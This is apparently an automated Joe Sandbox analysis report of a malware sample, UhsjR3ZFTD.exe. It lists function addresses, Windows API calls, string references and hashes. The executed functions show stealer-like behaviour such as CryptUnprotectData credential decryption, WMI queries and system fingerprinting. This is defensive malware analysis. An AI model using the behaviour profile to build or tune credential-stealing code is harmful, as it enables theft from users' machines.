Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 71fc25e41a1f8c1056146debabbbb326db208cef5b153fec13cd972151857ec4
Instruction ID: ef7a70199d41bc448de90bbac322d765599dd1449cf1f69fcff2d508b12e204e
Opcode Fuzzy Hash: 71fc25e41a1f8c1056146debabbbb326db208cef5b153fec13cd972151857ec4
Instruction Fuzzy Hash: 9301BCB5A056149BCB46EF20C849A7C7B63FF95380B14041DE8025B382CF34AE06CFD9

Function 006DF5C1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,006DF65D,00000000,?,006F1E18,?,?,?,006DF594,00000004,InitializeCriticalSectionEx,006E90D4,006E90DC), ref: 006DF5CE
GetLastError.KERNEL32(?,006DF65D,00000000,?,006F1E18,?,?,?,006DF594,00000004,InitializeCriticalSectionEx,006E90D4,006E90DC,00000000,?,006D500C), ref: 006DF5D8
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 006DF600

Strings

api-ms-, xrefs: 006DF5E5

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 4d30357ed03cd5d9dd56456e710180a1604a57bfecd667e220f3216d5371ffde
Instruction ID: 166dc264aa3b3acd9c2bee358aba4ec5532fb591cdcd99603f4b1fc518f61e57
Opcode Fuzzy Hash: 4d30357ed03cd5d9dd56456e710180a1604a57bfecd667e220f3216d5371ffde
Instruction Fuzzy Hash: 45E04F30A85384B7EB201B62EC4AB9D3B979B10B51F244031F90DAC6F2DBA2E8509959

Function 006DD3BE Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(6BA95F62,00000000,00000000,?), ref: 006DD421

Part of subcall function 006D5471: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006D6C45,?,00000000,-00000008), ref: 006D54D2

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006DD673
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006DD6B9
GetLastError.KERNEL32 ref: 006DD75C

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 2f047f946fa38397c38c952af5e5041382b539d2c19d13c0913d53be21d5217e
Instruction ID: 7e654446a10ae64200f688476df8e629b9d27da3274b236fdd5a2105a229fb9f
Opcode Fuzzy Hash: 2f047f946fa38397c38c952af5e5041382b539d2c19d13c0913d53be21d5217e
Instruction Fuzzy Hash: 70D14AB5D042589FCF15DFA8D880AEDBBF6FF09314F28416AE466EB351D630A942CB50

Function 006D46E3 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 006D47AA
___AdjustPointer.LIBCMT ref: 006D47CD
___AdjustPointer.LIBCMT ref: 006D4869

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: c7578f95a455e3f191f7591e8af6711bbd362c25df8946a359d47251d8c898c2
Instruction ID: 290a2f462a62074062990e4b61bf86dc63b04f614bea5bd8ba6b7114c614a8fb
Opcode Fuzzy Hash: c7578f95a455e3f191f7591e8af6711bbd362c25df8946a359d47251d8c898c2
Instruction Fuzzy Hash: B951E172E05246AFDB288F50C881BBAB3A6FF05340F24412FE81997791EB31EC41DB90

Function 006DB1E6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 006D5471: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006D6C45,?,00000000,-00000008), ref: 006D54D2

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 006DB24A
__dosmaperr.LIBCMT ref: 006DB251
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 006DB28B
__dosmaperr.LIBCMT ref: 006DB292

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 91193064c462a4d00d0ee22b6b853d02cca50bf9238de22d25f322905e60aa99
Instruction ID: 2b0b43f8fc2bb98f4bc8ddfb17423b32418e6fc2ef92712456ede86c7f5f4c03
Opcode Fuzzy Hash: 91193064c462a4d00d0ee22b6b853d02cca50bf9238de22d25f322905e60aa99
Instruction Fuzzy Hash: 19219072E00205EFDB20AF618881D7FB7AAEF02364712561EF8599B751DB30EE418B90

Function 006CCA72 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f025c7ba3bafae7c8a973c8a816fff08e584b73a5314f0f1d11f6ea75dd075b
Instruction ID: 0746a24e70a9f7ec5d4e13d3ee71d6b49c3cfcc826e607b516846784251cd75b
Opcode Fuzzy Hash: 0f025c7ba3bafae7c8a973c8a816fff08e584b73a5314f0f1d11f6ea75dd075b
Instruction Fuzzy Hash: 96217F31600619AFCB50EFA59C95EBB77AAEF01374715451DF81DDB250EB30EC4187A0

Function 006DC5DE Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 006DC5E6

Part of subcall function 006D5471: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006D6C45,?,00000000,-00000008), ref: 006D54D2

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006DC61E
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006DC63E

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 3aaa3ff261eb311fd13bb455cad195ef72e86dd6372f00e01150b13924b8e4ad
Instruction ID: c5b140bd517cf8cf70587aa988c3a9bdcd732e4bc69769815be370171150857c
Opcode Fuzzy Hash: 3aaa3ff261eb311fd13bb455cad195ef72e86dd6372f00e01150b13924b8e4ad
Instruction Fuzzy Hash: 0E1104A1D01A9A7FA72127715CCACBF79AEDE893A4750241AF802D1300FE60CD0195B9

Function 006E4400 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000), ref: 006E4417
GetLastError.KERNEL32(?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000,?,?,?,006DD0F6,?), ref: 006E4423

Part of subcall function 006E4480: CloseHandle.KERNEL32(FFFFFFFE,006E4433,?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000,?,?), ref: 006E4490

___initconout.LIBCMT ref: 006E4433

Part of subcall function 006E4455: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006E43F1,006E38DC,?,?,006DD7B0,?,00000000,00000000,?), ref: 006E4468

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000,?), ref: 006E4448

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: e3dce4ac7ba4bdde20ecc7810362184170dd5668e782ff9244aeb63bd1ce6405
Instruction ID: 0c1f85e47bf4f20877443e6ee56a867ac57e95673ff62e1f11f77bed4cc0a3ec
Opcode Fuzzy Hash: e3dce4ac7ba4bdde20ecc7810362184170dd5668e782ff9244aeb63bd1ce6405
Instruction Fuzzy Hash: 12F03736201294FBCF531FE5EC44A993FA7FB493A4B055010FA1889170CB338960DB95

Function 006D9D96 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,006CF869,?,?,?,00000055,?,-00000050,?,?,?), ref: 006D9E55
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,006CF869,?,?,?,00000055,?,-00000050,?,?), ref: 006D9E8C

Strings

utf8, xrefs: 006D9F5E

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: e5d19edca31601c55c81d55c9cfb06d86d529aeaf0f6c11d5840ddfdc6f38a55
Instruction ID: d568eb450087bfefaa26ed2ce6ba0fbe2614a824aee537a3ed82de95c5dcadca
Opcode Fuzzy Hash: e5d19edca31601c55c81d55c9cfb06d86d529aeaf0f6c11d5840ddfdc6f38a55
Instruction Fuzzy Hash: 9351C471E04301AADB69AB71CC42BF673ABAF45700F15052FF545DB381EB70D98096B5

Function 006D4DE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,006D4CE1,?,?,00000000,00000000,00000000,?), ref: 006D4E05

Strings

RCC, xrefs: 006D4E1F
MOC, xrefs: 006D4E17

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 4ed9aac59775e8f91cb6c90ac09c3834c9d203e7bd6d01498e867e50e6fa7db5
Instruction ID: 40d8cde3cf1dd708f04527163ec683459525edcb8dba508aa544db83d4dcdd5c
Opcode Fuzzy Hash: 4ed9aac59775e8f91cb6c90ac09c3834c9d203e7bd6d01498e867e50e6fa7db5
Instruction Fuzzy Hash: ED413571D00209ABCF15DF98D881AEEBBB6BF48304F18415AF908A7361DB359D51DB50

Function 006D464C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 006D48C3

Strings

csm, xrefs: 006D48E5
csm, xrefs: 006D4956

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 66f928c3ee2d8d89342088f00f05e1e27eda8634cef8f581566b28d6278b0ef3
Instruction ID: 3a70ef5a1311adbc7e33400e1a3849bf5b85b60e05d6158528c57efbdcce4137
Opcode Fuzzy Hash: 66f928c3ee2d8d89342088f00f05e1e27eda8634cef8f581566b28d6278b0ef3
Instruction Fuzzy Hash: 5C3181329002199BCF269F56C8949AB7BA7FB09315B18459BF8985D321CB33DC61DB81

Function 006C39F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006C3A1E
std::_Lockit::~_Lockit.LIBCPMT ref: 006C3A49

Strings

w2l, xrefs: 006C3A56

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: w2l
API String ID: 593203224-126607045
Opcode ID: e09e9715871709a4115ee56a61967d188497bff2ea39774ff1ed7beff0139fff
Instruction ID: 56b32f82c41ffb9ceb60bfb108dcd0a32ec55245e485ea997930840757c885cd
Opcode Fuzzy Hash: e09e9715871709a4115ee56a61967d188497bff2ea39774ff1ed7beff0139fff
Instruction Fuzzy Hash: E101C0B0D04208DFCB44EFA8D881BADBBB1FB08300F8054ADE416AB351DB306A54CF55

Analysis Process: UhsjR3ZFTD.exePID: 3960, Parent PID: 5484COMMON

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	55%
Total number of Nodes:	313
Total number of Limit Nodes:	24

Executed Functions

Function 00438860 Relevance: 32.2, APIs: 11, Strings: 7, Instructions: 666
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C), ref: 00438AE7
SysAllocString.OLEAUT32(k2`0), ref: 00438B60
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438B9D
SysAllocString.OLEAUT32(07B705B3), ref: 00438BEA
SysAllocString.OLEAUT32(09C50FBD), ref: 00438CAD
VariantInit.OLEAUT32(EFEEEDF4), ref: 00438D1C
VariantClear.OLEAUT32(?), ref: 00438E8F
SysFreeString.OLEAUT32(?), ref: 00438EB3
SysFreeString.OLEAUT32(?), ref: 00438EB9
SysFreeString.OLEAUT32(00000000), ref: 00438EC6
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438EFA

Strings

x;, xrefs: 00438C34
]E, xrefs: 00439062
]E, xrefs: 00438C2C
b>c<, xrefs: 00438AFD
,./,, xrefs: 00438947
S, xrefs: 00438C24
k2`0, xrefs: 00438B5B, 00438B5F

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: ,./,$S$]E$]E$b>c<$k2`0$x;
API String ID: 2573436264-4038474941
Opcode ID: 31b644112a68f3d18aacb8b5db5a05eceaae594e11df8e9f15bced72581e9853
Instruction ID: 6e5b62aa8b1ec0da306810ad309870e49cdd1aa0d64757ab7dc6e3fbd6c770b3
Opcode Fuzzy Hash: 31b644112a68f3d18aacb8b5db5a05eceaae594e11df8e9f15bced72581e9853
Instruction Fuzzy Hash: 3122EFB66083419BD310CF28C885B6BBBE5EFC9314F14892DF595DB2A0DB79D805CB86

Function 00419362 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 390
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043D910: LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004197EB

Strings

'>0=, xrefs: 0041952E
-&64, xrefs: 00419544
?7?0, xrefs: 0041950D
#1!%, xrefs: 00419539
D$p, xrefs: 004195C2
e, xrefs: 0041955A
14'", xrefs: 00419470
*8$), xrefs: 00419523
x">*, xrefs: 00419430

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: CryptDataInitializeThunkUnprotect
String ID: #1!%$'>0=$*8$)$-&64$14'"$?7?0$e$x">*$D$p
API String ID: 279577407-4262920783
Opcode ID: 432f6f01f6f39532e5583c1ea13b867eeb044dab6d0921c5a80d4da759cddaac
Instruction ID: e77fc135ad70ed6736d1295220b367ee2e65166797322382e6457787232dfc05
Opcode Fuzzy Hash: 432f6f01f6f39532e5583c1ea13b867eeb044dab6d0921c5a80d4da759cddaac
Instruction Fuzzy Hash: C3C109B2A083418BD728CF28C8A17AFB7E2AFD5304F19893DD49987351DB389C45CB46

Function 004229CD Relevance: 11.5, APIs: 3, Strings: 3, Instructions: 1008
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`*B, xrefs: 00422AAE
"0B, xrefs: 00423016
7x~, xrefs: 004234C1

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: "0B$7x~$`*B
API String ID: 0-767839351
Opcode ID: bfd9e8ac35199f97e1d7b9b7a72bdacfbe17c41595a0c7f5bb3de10ab4316b55
Instruction ID: 9fd70d4789ae2a743fdbd81f1d1a9eea778115e9b5f68926e692af45083946f2
Opcode Fuzzy Hash: bfd9e8ac35199f97e1d7b9b7a72bdacfbe17c41595a0c7f5bb3de10ab4316b55
Instruction Fuzzy Hash: B4726576A08211CFD714CF68EC817AAB7B2FF89314F09897CE945AB391D7389901CB95

Function 00432FE0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00433029
GetSystemMetrics.USER32 ref: 00433039

Strings

, xrefs: 00433126
C7C, xrefs: 004331B6
Y8C, xrefs: 004331E2
)6C, xrefs: 00433203

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: MetricsSystem
String ID: $)6C$C7C$Y8C
API String ID: 4116985748-1654261340
Opcode ID: 5c122eb9c0143f1b49a1e8f4bb7b68f4f6dba1365be09ef1174e0909afcf80c5
Instruction ID: 4b006a6d5d8b16d53f58adea831d835725ce84f357d2a915258799e4b83f44bd
Opcode Fuzzy Hash: 5c122eb9c0143f1b49a1e8f4bb7b68f4f6dba1365be09ef1174e0909afcf80c5
Instruction Fuzzy Hash: 5E817CB45193808FE360DF25C58879EBBE0BB85348F508D2EE4D88B350DBB89549CF5A

Function 00408640 Relevance: 7.7, APIs: 5, Instructions: 220
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408664
GetCurrentThreadId.KERNEL32 ref: 0040866E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040874C
GetForegroundWindow.USER32 ref: 00408803
ExitProcess.KERNEL32 ref: 004088E8

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 10b0eff6467ca18bcb2542539502c240d5f51aa7d1eb33122d427624a9865ed6
Instruction ID: cffc6beeb204386c5c3c11e80dbd3dd055112d37bec62ae1e5896589e5666a59
Opcode Fuzzy Hash: 10b0eff6467ca18bcb2542539502c240d5f51aa7d1eb33122d427624a9865ed6
Instruction Fuzzy Hash: 0F613977B447084BD718AFA9CD8635AB6D29B84710F0E813DA594DB3D2ED7CDC009789

Function 0042BE8A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358

Strings

BVAI, xrefs: 0042C52A

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: BVAI
API String ID: 3960555810-2651495128
